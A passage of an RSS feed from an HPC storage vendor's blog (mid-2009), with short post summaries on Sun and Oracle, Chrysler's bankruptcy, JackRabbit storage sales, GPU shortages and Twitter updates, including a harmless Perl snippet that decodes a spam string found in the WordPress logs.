      <description>* There seems to be an awful lot of pr0n types that follow ... I block them. Is this a losing battle? Should I just give in? [#](http://twitter.com/sijoe/statuses/2318023529)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>One bit of looking happened upon something else ... which resonates with todays economic climate</title>
      <link>https://blog.scalability.org/2009/06/one-bit-of-looking-happened-upon-something-else-which-resonates-with-todays-economic-climate/</link>
      <pubDate>Thu, 25 Jun 2009 04:28:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/one-bit-of-looking-happened-upon-something-else-which-resonates-with-todays-economic-climate/</guid>
      <description>I was looking up one of my favorite (silly) phrases after a long hard day getting mvsas to work correctly on a Pegasus workstation running Fedora. I won&amp;rsquo;t let this devolve into a Fedora bashing session, though Fedora does need it. That is what triggered this look though. I kept slogging at a number of Fedora misfeatures, until my efforts were rewarded. This resonated, and reminded me of one of my favorite (silly) phrases &amp;hellip; &amp;hellip; The beatings will continue until morale improves.</description>
    </item>
    
    <item>
      <title>Kick a region when its&#39; down ...</title>
      <link>https://blog.scalability.org/2009/06/kick-a-region-when-its-down/</link>
      <pubDate>Tue, 23 Jun 2009 20:17:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/kick-a-region-when-its-down/</guid>
      <description>I&amp;rsquo;ve been talking about the woes of the area we live and work in. Canton is right outside Detroit and Ann Arbor, Michigan. It&amp;rsquo;s a nice place for many reasons. But a tech haven? No. For a long time, we had lots of commercial supercomputing in this area. It was a good place to be w.r.t. this. But times, they are a-changing. CIO magazine has an article on &amp;ldquo;The Worst U.</description>
    </item>
    
    <item>
      <title>Does &#34;Best Practices&#34; really mean &#34;this is how we want to do it so nah nah to you&#34;?</title>
      <link>https://blog.scalability.org/2009/06/does-best-practices-really-mean-this-is-how-we-want-to-do-it-so-nah-nah-to-you/</link>
      <pubDate>Tue, 23 Jun 2009 14:39:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/does-best-practices-really-mean-this-is-how-we-want-to-do-it-so-nah-nah-to-you/</guid>
      <description>I&amp;rsquo;ve noticed this, that when people talk about &amp;ldquo;best practices&amp;rdquo; in HPC, usually there is &amp;hellip; well &amp;hellip; a slant to their analysis. Put another way &amp;hellip; can you get real unbiased information on &amp;ldquo;best practices&amp;rdquo; from a biased partisan, who might not have been exposed to alternative methods, and may have a financial interest in a particular set of practices? We see this with consultants seeking to sell their own services as &amp;ldquo;best practices&amp;rdquo;, with hardware and software vendors seeking to incorporate their products into &amp;ldquo;best practices&amp;rdquo; workflows.</description>
    </item>
    
    <item>
      <title>Sounds like Lustre is getting something of a bad rap</title>
      <link>https://blog.scalability.org/2009/06/sounds-like-lustre-is-getting-something-of-a-bad-rap/</link>
      <pubDate>Tue, 23 Jun 2009 14:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/sounds-like-lustre-is-getting-something-of-a-bad-rap/</guid>
      <description>Coverage from ISC09 in Hamburg has GPFS (from IBM) doing well, and Lustre being &amp;hellip; well &amp;hellip; Lustre. From InsideHPC&amp;rsquo;s coverage in the sidebar &amp;hellip;
You can follow them on twitter directly, or through the feed on InsideHPC. I recommend the latter, as John and team put up often interesting commentary after this.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-23</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-23/</link>
      <pubDate>Tue, 23 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-23/</guid>
      <description>* booted 96TB JackRabbit, w/o disks/raid, for initial checkout. Unit is fast as an #[hpc](http://search.twitter.com/search?q=%23hpc) platform, looking to bench the #[storage](http://search.twitter.com/search?q=%23storage) [#](http://twitter.com/sijoe/statuses/2285894794)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>An emerging plan to solve the national debt ...</title>
      <link>https://blog.scalability.org/2009/06/an-emerging-plan-to-solve-the-national-debt/</link>
      <pubDate>Sun, 21 Jun 2009 16:01:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/an-emerging-plan-to-solve-the-national-debt/</guid>
      <description>heh &amp;hellip;.
US To Trade Gold Reserves For Cash Through Cash4Gold.com</description>
    </item>
    
    <item>
      <title>shades of things to come for Sun</title>
      <link>https://blog.scalability.org/2009/06/shades-of-things-to-come-for-sun/</link>
      <pubDate>Sat, 20 Jun 2009 20:53:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/shades-of-things-to-come-for-sun/</guid>
      <description>There are still a few stalwarts who believe that Oracle&amp;rsquo;s purchase of Sun will continue their favorite projects and products. Then you see stuff like this:
Whoops.
Now fast forward a few weeks, for when Sun&amp;rsquo;s purchase closes.
So virtualbox is likely dead as a product. A few months ago I speculated that the purchase of Sun was brilliant in part due to all the technologies Oracle would get. Many would be shuttered.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-20</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-20/</link>
      <pubDate>Sat, 20 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-20/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) I looked at Sharethis and a bunch of others. Addtoany was the least annoying of the lot. I tried a number two weeks ago [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2233135919) [#](http://twitter.com/sijoe/statuses/2246497585)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>speaking of accelerating ...</title>
      <link>https://blog.scalability.org/2009/06/speaking-of-accelerating/</link>
      <pubDate>Sat, 20 Jun 2009 01:30:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/speaking-of-accelerating/</guid>
      <description>I have noticed that we are measuring quotes generated per day, versus last year when it was per week, or the years before where it was per month. Not a great metric, but we are definitely feeling pressed back in our seats as we accelerate hard. Its becoming apparent that I need to find additional pairs of hands, eyes, and brains (single or in pairs). Once we are sure all the stars are aligned, we&amp;rsquo;ll say more.</description>
    </item>
    
    <item>
      <title>14.1% and accelerating ...</title>
      <link>https://blog.scalability.org/2009/06/14-1-and-accelerating/</link>
      <pubDate>Fri, 19 Jun 2009 19:17:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/14-1-and-accelerating/</guid>
      <description>c.f. here
I heard this morning that it was 14.1% in May. I wonder when we are going to stop using the euphemism &amp;ldquo;the longest recession since the great depression&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Registering for an account: some things I have observed</title>
      <link>https://blog.scalability.org/2009/06/registering-for-an-account-some-things-i-have-observed/</link>
      <pubDate>Fri, 19 Jun 2009 12:58:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/registering-for-an-account-some-things-i-have-observed/</guid>
      <description>So the day job&amp;rsquo;s online store is up. We provide some of the information openly, and some information, specifically pricing, is available to people who register for an account. Why do we do it this way? I&amp;rsquo;ve found this to be a good way to distinguish between people who are merely curious, but wouldn&amp;rsquo;t consider purchasing, and people who want information for a potential purchase. If you are serious about something, you are going to be willing to dig a little deeper.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-19</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-19/</link>
      <pubDate>Fri, 19 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-19/</guid>
      <description>* Exploring twitter marketing. Please tweet back if you are interested in twitter based sales on #[storage](http://search.twitter.com/search?q=%23storage) and #[hpc](http://search.twitter.com/search?q=%23hpc) systems and support [#](http://twitter.com/sijoe/statuses/2227707831) * Just joined a twibe. Visit [http://twibes.com/HPC?v=0](http://twibes.com/HPC?v=0) to join [#](http://twitter.com/sijoe/statuses/2227988975) * Just started a Twibe. Visit [http://twibes.com/scalable](http://twibes.com/scalable) to join. [#](http://twitter.com/sijoe/statuses/2228008441)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-18</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-18/</link>
      <pubDate>Thu, 18 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-18/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Tigers ... nooooooo what is it with these Detroit teams... is there something in the water here? [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2202218024) [#](http://twitter.com/sijoe/statuses/2205419461)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Dealing with the Tesla non-availability issue</title>
      <link>https://blog.scalability.org/2009/06/dealing-with-the-tesla-non-availability-issue/</link>
      <pubDate>Thu, 18 Jun 2009 02:14:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/dealing-with-the-tesla-non-availability-issue/</guid>
      <description>If you haven&amp;rsquo;t heard, Teslas are hard to come by. We have several Pegasus systems that customers have purchased, that we can&amp;rsquo;t get the units for. All of the distributors and resellers we have spoken to indicate that they are getting a small fraction of their orders filled. We have had units on order over a month. Several more orders, and a hard deadline to get units filled.
We have heard rumors of fabrication problems and part recalls (given the past history with other chipsets, some believe this to be the case, though I am not sure &amp;hellip; more likely a low yield coupled with something else).</description>
    </item>
    
    <item>
      <title>A &#34;FOR DEMONSTRATION USE ONLY&#34; bios on the SAS controller ...  huh?</title>
      <link>https://blog.scalability.org/2009/06/a-for-demonstration-use-only-bios-on-the-sas-controller-huh/</link>
      <pubDate>Thu, 18 Jun 2009 01:08:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/a-for-demonstration-use-only-bios-on-the-sas-controller-huh/</guid>
      <description>Well, it&amp;rsquo;s not just that it says that it is a beta bios. This is annoying but ok, as you know the other bios will (hopefully) soon follow. It&amp;rsquo;s that it says it&amp;rsquo;s &amp;ldquo;FOR DEMONSTRATION PURPOSES ONLY&amp;rdquo;. I snapped a picture of the bios boot screen. Will post it tomorrow if there is interest. Apparently, the motherboards are indeed shipping this way. We were told originally that demand was high, and that&amp;rsquo;s why they were delayed.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-17</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-17/</link>
      <pubDate>Wed, 17 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-17/</guid>
      <description>* For a downward moving economy we are busier than ever, selling #[jackrabbit](http://search.twitter.com/search?q=%23jackrabbit) boxes with many #[terabyte](http://search.twitter.com/search?q=%23terabyte) to proposed #[petabyte](http://search.twitter.com/search?q=%23petabyte) scale #[storage](http://search.twitter.com/search?q=%23storage) [#](http://twitter.com/sijoe/statuses/2198137724) * Just added myself to the [http://wefollow.com](http://wefollow.com) twitter directory under: #[storage](http://search.twitter.com/search?q=%23storage) #[HPC](http://search.twitter.com/search?q=%23HPC) #[startup](http://search.twitter.com/search?q=%23startup) [#](http://twitter.com/sijoe/statuses/2198178717) * I just added myself to [http://twitr.org](http://twitr.org) Twitter Directory under #[storage](http://search.twitter.com/search?q=%23storage) #[hpc](http://search.twitter.com/search?q=%23hpc) #[startup](http://search.twitter.com/search?q=%23startup) [#](http://twitter.com/sijoe/statuses/2198210459)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Benchmarks: mdbnch</title>
      <link>https://blog.scalability.org/2009/06/benchmarks-mdbnch/</link>
      <pubDate>Wed, 17 Jun 2009 05:09:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/benchmarks-mdbnch/</guid>
      <description>Many moons ago, we used MDBNCH as a performance test case for new compilers and platforms. It is a molecular dynamics benchmark test. Large caches help it. So do fast instruction issue rates. And bloody fast FP execution units. For a long time I had wondered when we would see the first crossing of 1 second to complete this benchmark. It was getting closer and closer. So this evening, with gfortran, I built it with -O3.</description>
    </item>
    
    <item>
      <title>There are fads, and then there are FADs</title>
      <link>https://blog.scalability.org/2009/06/there-are-fads-and-then-there-are-fads/</link>
      <pubDate>Tue, 16 Jun 2009 23:36:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/there-are-fads-and-then-there-are-fads/</guid>
      <description>Sadly, technologists and IT people are not beyond buying into fads. A fad is basically a temporarily enhanced interest in some aspect of a market, or a product, or a technology. Fads pass. The repercussions of buying into fads can be &amp;hellip; well &amp;hellip; significant. So can the problem of missing the boat &amp;hellip; not on fads, but fads that develop legs and become, effectively, movements, groundswells, or even disruptive technologies.</description>
    </item>
    
    <item>
      <title>... and Rock gets canceled ...</title>
      <link>https://blog.scalability.org/2009/06/and-rock-gets-canceled/</link>
      <pubDate>Tue, 16 Jun 2009 14:12:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/and-rock-gets-canceled/</guid>
      <description>From the NYT, a blog post on the passing of Rock.
Been there, done that. SGI&amp;rsquo;s Beast and Alien. Would have been interesting chips. Killed because Itanium was going to conquer all. No, wait, I am not kidding &amp;hellip; It will &amp;hellip; eventually &amp;hellip; someday &amp;hellip; It appears little bits of hardware keep falling off the map. And HPC. It&amp;rsquo;s gone. What does this mean to SGE, Lustre, the compiler groups &amp;hellip; Rock was an interesting chip.</description>
    </item>
    
    <item>
      <title>Egads ... Sun admitted Oracle really didn&#39;t want the whole enchilada ...</title>
      <link>https://blog.scalability.org/2009/06/egads-sun-admitted-oracle-really-didnt-want-the-whole-enchilada/</link>
      <pubDate>Mon, 15 Jun 2009 19:01:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/egads-sun-admitted-oracle-really-didnt-want-the-whole-enchilada/</guid>
      <description>Saw this on the Register (therefore it must be true)</description>
    </item>
    
    <item>
      <title>A quandry on partnerships</title>
      <link>https://blog.scalability.org/2009/06/a-quandry-on-partnerships/</link>
      <pubDate>Sun, 14 Jun 2009 12:51:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/a-quandry-on-partnerships/</guid>
      <description>The day job has had partnerships in the past, and maintains a number of active ones. We have reseller partnerships, joint service/support partnerships, development partnerships &amp;hellip; and so forth. Not all (or even a majority) are listed on our site. What we view as a partnership is a relationship which will be mutually beneficial &amp;hellip; aid both parties &amp;hellip; without causing harm to either. If we are going to partner, then there is a bit of an exchange of something of value, so we get something akin to a 1+1=3 moment, for both organizations.</description>
    </item>
    
    <item>
      <title>OT:  Red Wings vs Pittsburgh in game 7 of Stanley Cup final</title>
      <link>https://blog.scalability.org/2009/06/ot-red-wings-vs-pittsburgh-in-game-7-of-stanley-cup-final/</link>
      <pubDate>Thu, 11 Jun 2009 17:31:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ot-red-wings-vs-pittsburgh-in-game-7-of-stanley-cup-final/</guid>
      <description>Not really HPC, though our friends at PSC have named various supercomputers after Mario Lemieux &amp;hellip; Tomorrow night &amp;hellip; Wings vs Penguins, game 7. We may have to give special discounts if the Wings take the cup! [update] &amp;hellip; and it&amp;rsquo;s over. No discount for winning the cup. Wings didn&amp;rsquo;t start playing until 8 minutes left in the 3rd period. Ugh.</description>
    </item>
    
    <item>
      <title>The coming bi(tri?)furcation in HPC, part 1</title>
      <link>https://blog.scalability.org/2009/06/the-coming-bitrifurcation-in-hpc-part-1/</link>
      <pubDate>Wed, 10 Jun 2009 19:26:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/the-coming-bitrifurcation-in-hpc-part-1/</guid>
      <description>This will be short. Mostly a hat tip to Doug Eadline who in a very recent article talks about something we have been talking about privately for a while. Read the article, and afterward, ponder a point he was discussing:
I believe so. Doug cautions people to not read into his words too much. This said, we are building very muscular desktops sporting 24 cores, 256 GB ram, 1+ GB/s IO channels, and accelerators of several flavors.</description>
    </item>
    
    <item>
      <title>[Warning:  Old news] Ouch ...</title>
      <link>https://blog.scalability.org/2009/06/ouch-2/</link>
      <pubDate>Wed, 10 Jun 2009 17:50:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ouch-2/</guid>
      <description>[Warning] This is old news that got reposted as new.
From LinuxHPC.org (Ken Farmer&amp;rsquo;s excellent site) I saw this &amp;hellip;
I wonder if this impacts any TeamHPC or M&amp;amp;A GSA contracts, which are usually quite &amp;hellip; explicit &amp;hellip; about lawsuit issues and eligibility for opportunities. They might have to go through a proxy if they can&amp;rsquo;t go direct.</description>
    </item>
    
    <item>
      <title>Chrysler sale approved</title>
      <link>https://blog.scalability.org/2009/06/chrysler-sale-approved/</link>
      <pubDate>Wed, 10 Jun 2009 00:18:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/chrysler-sale-approved/</guid>
      <description>The supreme court has just rescinded its stay of the sale. Understanding that I am a fan and returning customer to Chrysler (for its Jeep products), my biases should be clear &amp;hellip; this is very bad news to any senior creditor out there, dealing with a large troubled debtor, and a group with political patronage. Why would any bank or lending institution possibly grant a loan, if political considerations will outweigh legal considerations?</description>
    </item>
    
    <item>
      <title>On the price we all pay for SEO</title>
      <link>https://blog.scalability.org/2009/06/on-the-price-we-all-pay-for-seo/</link>
      <pubDate>Tue, 09 Jun 2009 16:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/on-the-price-we-all-pay-for-seo/</guid>
      <description>SEO is an attempt to influence an algorithm for ranking and displaying data entered into search systems. Google and other search engines perform many calculations to try to return &amp;ldquo;meaningful&amp;rdquo; results. Well, they use a particular definition of meaningful. One that involves what they consider to be a consensus &amp;hellip; if a page has lots of links to it from many other pages, then it must have meaning. This may have been true once.</description>
    </item>
    
    <item>
      <title>Chrysler hits a major bump</title>
      <link>https://blog.scalability.org/2009/06/chrysler-hits-a-major-bump/</link>
      <pubDate>Mon, 08 Jun 2009 21:30:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/chrysler-hits-a-major-bump/</guid>
      <description>[updated] see at bottom: Chrysler is an HPC user. I am a Chrysler customer. We have 2 Jeep Grand Cherokees. Words like &amp;ldquo;cold dead fingers&amp;rdquo; come to mind when I think about giving them up. Well, ok &amp;hellip; on the way in to the lab this morning, my interior roof is starting to leak &amp;hellip; 13 year old Jeep. Chrysler&amp;rsquo;s bankruptcy was engineered. Not well engineered, just engineered. In the process of setting it up, you saw political patronage completely derail legal rights, specifically senior versus junior creditors.</description>
    </item>
    
    <item>
      <title>We made the Great Lakes IT report this past Sunday</title>
      <link>https://blog.scalability.org/2009/06/we-made-the-great-lakes-it-report-this-past-sunday/</link>
      <pubDate>Mon, 08 Jun 2009 12:36:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/we-made-the-great-lakes-it-report-this-past-sunday/</guid>
      <description>I did email Matt Rousch to let him know what we are up to. Hopefully he will come by when we are testing the 96TB unit we sold :) Linky is here.</description>
    </item>
    
    <item>
      <title>The rise of the &#39;new&#39; issues: Data Motion</title>
      <link>https://blog.scalability.org/2009/06/the-rise-of-the-new-issues-data-motion/</link>
      <pubDate>Sun, 07 Jun 2009 17:29:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/the-rise-of-the-new-issues-data-motion/</guid>
      <description>I&amp;rsquo;ve been talking about data motion (moving data between place &amp;ldquo;a&amp;rdquo; and &amp;ldquo;b&amp;rdquo;) as a problem for a long time now. You can summarize it easily in a very simple equation, and use that to explain what is going wrong, and estimate how much we are going to suffer going forward. In a nutshell, data motion is measurable in the time it takes to copy a chunk of data between &amp;lsquo;places&amp;rsquo;.</description>
    </item>
    
    <item>
      <title>Press release from day job ... 96TB and Flash/SSD based JackRabbits!</title>
      <link>https://blog.scalability.org/2009/06/press-release-from-day-job/</link>
      <pubDate>Thu, 04 Jun 2009 18:43:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/press-release-from-day-job/</guid>
      <description>c.f. this link CANTON, MI - June 4, 2009 UTC - Scalable Informatics, a High Performance Computing solutions provider known for innovation, is pleased to announce the immediate availability of several new, low cost, high performance, high capacity, tightly coupled storage and processing systems. Scalable Informatics JackRabbit systems provide low cost, highly reliable RAID storage, with performance of 700 MB/s on low end systems, to in excess of 1.5 GB/s to disk using RAID 6 for midrange systems.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-04</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-04/</link>
      <pubDate>Thu, 04 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-04/</guid>
      <description>* 96TB, 5U, 48 honking fast drives, [http://scalableinformatics.com/jackrabbit](http://scalableinformatics.com/jackrabbit) , to be used for cloud computing storage targets [#](http://twitter.com/sijoe/statuses/2023205143)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>It&#39;s official ... we have sold our first 96TB JR5 unit</title>
      <link>https://blog.scalability.org/2009/06/its-official-we-have-sold-our-first-96tb-jr5-unit/</link>
      <pubDate>Wed, 03 Jun 2009 23:45:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/its-official-we-have-sold-our-first-96tb-jr5-unit/</guid>
      <description>Waaaa hooooo!!!! This is also our first big Nehalem JackRabbit sale. For those who don&amp;rsquo;t know, JackRabbit is a cost effective, very fast, very powerful storage and integrated processing system. Units go from 2 to 5 rack units, with capacities from 9TB through 96TB, and cost starting well under $1/GB. Raw performance, performance density, and storage density make this an ideal component of a cluster storage or cloud storage system. This unit in particular is going to a cloud computing provider.</description>
    </item>
    
    <item>
      <title>Weee!  A new wordpress attack in the wild ... or is this an attack?  Or something worse?  SPAM mebbe?</title>
      <link>https://blog.scalability.org/2009/06/weee-a-new-wordpress-attack-in-the-wild-or-is-this-an-attack-or-something-worse-spam-mebbe/</link>
      <pubDate>Wed, 03 Jun 2009 12:59:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/weee-a-new-wordpress-attack-in-the-wild-or-is-this-an-attack-or-something-worse-spam-mebbe/</guid>
      <description>Sitting here, drinking coffee, preparing for the short ride into work (probably have to stop off at Meijer to pick up some turnovers &amp;hellip; mmmmm turnovers!) when I noticed this on my wordpress logs tail
Hey &amp;hellip; someone is trying to hack us. Cool. But what does this say?
Ok, let me use a quickie script to handle this for me &amp;hellip;
&amp;lt;code&amp;gt;
#!/usr/bin/perl
my $hex=&amp;quot;\xd0\xa1\xd0\xbf\xd0\xb0\xd1\x81\xd0\xb8\xd0\xb1\xd0\xbe, \xd0\xbf\xd0\xbe ... \xd1\x87\xd1\x82\xd0\xbe \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb5\xd1\x80\xd0\xbf\xd0\xbd\xd1\x83\xd1\x82\xd1\x8c&amp;quot;;
printf &amp;quot;%s\n&amp;quot;,$hex;
&amp;lt;/code&amp;gt;
Cool.</description>
    </item>
    
    <item>
      <title>Ok, this was also funny</title>
      <link>https://blog.scalability.org/2009/06/ok-this-was-also-funny/</link>
      <pubDate>Wed, 03 Jun 2009 04:19:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/ok-this-was-also-funny/</guid>
      <description>A reader pointed out that google chrome complained about this site. Said we spread malware. So I checked, and sure enough, got a message to that effect. Looking into it, it was complaining about something in an iframe in front of the video. This came from the link on youtube. So to get this correct &amp;hellip; Google was complaining about the embed code contained on youtube. Don&amp;rsquo;t think about this one too hard.</description>
    </item>
    
    <item>
      <title>Tangential, humorous, and akin to what we experience</title>
      <link>https://blog.scalability.org/2009/06/tangential-humorous-and-akin-to-what-we-experience/</link>
      <pubDate>Mon, 01 Jun 2009 13:28:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/tangential-humorous-and-akin-to-what-we-experience/</guid>
      <description>Doug showed me this video this morning. It&amp;rsquo;s not about HPC, but what you see here is &amp;hellip; well &amp;hellip; strangely reminiscent of what we encounter when it comes time to negotiate a sale. It is humorous only if you haven&amp;rsquo;t seen people try this stuff.
We have people try this stuff all the time with us.</description>
    </item>
    
    <item>
      <title>Finally:  Direct Postfix-bogofilter integration</title>
      <link>https://blog.scalability.org/2009/05/finally-direct-postfixbogofilter-integration/</link>
      <pubDate>Sun, 31 May 2009 14:40:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/finally-direct-postfixbogofilter-integration/</guid>
      <description>We&amp;rsquo;ve been running a pipeline for our spam tagging and virus removal for a while. It was integrated into the pipeline via procmail, not directly into postfix. Well, I finally figured out how to do one of the stages as an integrated tagger within postfix. Turns out to be fairly easy. And I didn&amp;rsquo;t create the method, I simply adapted it. We can always switch back to the other method if needed.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-30</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-30/</link>
      <pubDate>Sat, 30 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-30/</guid>
      <description>* Doug got the online store up, [http://scalableinformatics.com/catalog](http://scalableinformatics.com/catalog) JackRabbits and Pegasus(es) and Delta-V&#39;s ... buy as many as you want [#](http://twitter.com/sijoe/statuses/1965390591)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>New online store is up and live!!!</title>
      <link>https://blog.scalability.org/2009/05/new-online-store-is-up-and-live/</link>
      <pubDate>Fri, 29 May 2009 22:09:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/new-online-store-is-up-and-live/</guid>
      <description>Linky linky. You can buy JackRabbits, and Pegasus, and DeltaV (ΔV) &amp;hellip; all online, from the comfort of your armchair at home. And bunny slippers, must not forget the bunny slippers. You have to create an account on the site, and you need a real email and contact data to see pricing/enter stuff into the cart. Account creation will require administrator approval. It is very cool, Doug ordered several JackRabbits for himself this week&amp;hellip; None of this would have been possible, of course, without Doug, and his tireless and fearless pursuit of this function.</description>
    </item>
    
    <item>
      <title>Coming up for air .... gulp</title>
      <link>https://blog.scalability.org/2009/05/coming-up-for-air-gulp/</link>
      <pubDate>Fri, 29 May 2009 17:05:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/coming-up-for-air-gulp/</guid>
      <description>Wow &amp;hellip; this has been one of our most active days/weeks. I hope we don&amp;rsquo;t delay the PR, but I am clearly in need of additional hands. Doug suggested cloning, though this is illegal in the state of Michigan. I thought I had cleared my plate last night. Nope. No such luck.</description>
    </item>
    
    <item>
      <title>Two more down</title>
      <link>https://blog.scalability.org/2009/05/two-more-down/</link>
      <pubDate>Fri, 29 May 2009 04:44:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/two-more-down/</guid>
      <description>Visteon filed Chapter 11 today. Visteon is a parts supplier to Ford. Ford now has to help them out &amp;hellip; or risk not being able to get sub-assemblies. This is not good for Ford, and significantly increases the risk for them. Metaldyne also filed. Metaldyne was a supplier to Chrysler. When Chrysler filed Chapter 11, well, suppliers won&amp;rsquo;t get paid for a while &amp;hellip; if at all.
Metaldyne will sell chunks of itself off.</description>
    </item>
    
    <item>
      <title>The risk of bricking, and the lessons that people need to learn</title>
      <link>https://blog.scalability.org/2009/05/the-risk-of-bricking-and-the-lessons-that-people-need-to-learn/</link>
      <pubDate>Fri, 29 May 2009 04:01:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-risk-of-bricking-and-the-lessons-that-people-need-to-learn/</guid>
      <description>I read several excellent synopses from SiCortex former staff such as Jeff Darcy, and Matt Reilly. Jeff and Matt gave several excellent arguments as to why SiCortex succeeded, despite getting the plug pulled. Some will guffaw about this, and say that pulling the plug was evidence of failure. They would be wrong. VCs will pull plugs everywhere from pre-term sheet to capital call time. Their rationale for pulling plugs won&amp;rsquo;t always make sense, to you, or others.</description>
    </item>
    
    <item>
      <title>Plugins for email followup installed</title>
      <link>https://blog.scalability.org/2009/05/plugins-for-email-followup-installed/</link>
      <pubDate>Fri, 29 May 2009 01:34:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/plugins-for-email-followup-installed/</guid>
      <description>You have to have registered for an account to use them, and you have to be logged in to enable it. I removed as many &amp;ldquo;garbage&amp;rdquo; accounts as I could find. If I removed your account and it wasn&amp;rsquo;t garbage, please accept my apology. If I see an increase in garbage account registrations, I&amp;rsquo;ll change the registration procedures. I hope I don&amp;rsquo;t have to do it. I tried the follow up, I think it is working (I got the email).</description>
    </item>
    
    <item>
      <title>Looks like our first 96TB JR5 will be sold early next week</title>
      <link>https://blog.scalability.org/2009/05/looks-like-our-first-96tb-jr5-will-be-sold-early-next-week/</link>
      <pubDate>Wed, 27 May 2009 16:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/looks-like-our-first-96tb-jr5-will-be-sold-early-next-week/</guid>
      <description>We have &amp;hellip; well &amp;hellip; lots of interest from cloud folk. And cluster folk. And &amp;hellip; well &amp;hellip; you get it. More soon. And yes, the PR is open in OO v3.0.1 on my desktop as we speak. If I do my job right, it should be out Friday.</description>
    </item>
    
    <item>
      <title>24 hour rule --- revoked</title>
      <link>https://blog.scalability.org/2009/05/24-hour-rule/</link>
      <pubDate>Wed, 27 May 2009 16:57:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/24-hour-rule/</guid>
      <description>[update] In multiple conversations/emails today, I learned that this was indeed true. The link to InsideHPC story is here. Vipin and I were rooting for them, as the technology was interesting, the approach different, and the value apparent. This was before we talked to them about possibly working together. This company did have good technology, did have great people. Now a VC/financial group has assets they have to sell. Maybe someone can explain to me how that is more valuable than a viable functioning growing going concern, generating revenue, closing in on break even.</description>
    </item>
    
    <item>
      <title>Apparently, we ain&#39;t seen nothin&#39; ... yet ...</title>
      <link>https://blog.scalability.org/2009/05/apparently-we-aint-seen-nothin-yet/</link>
      <pubDate>Tue, 26 May 2009 11:50:20 +0000</pubDate>
      
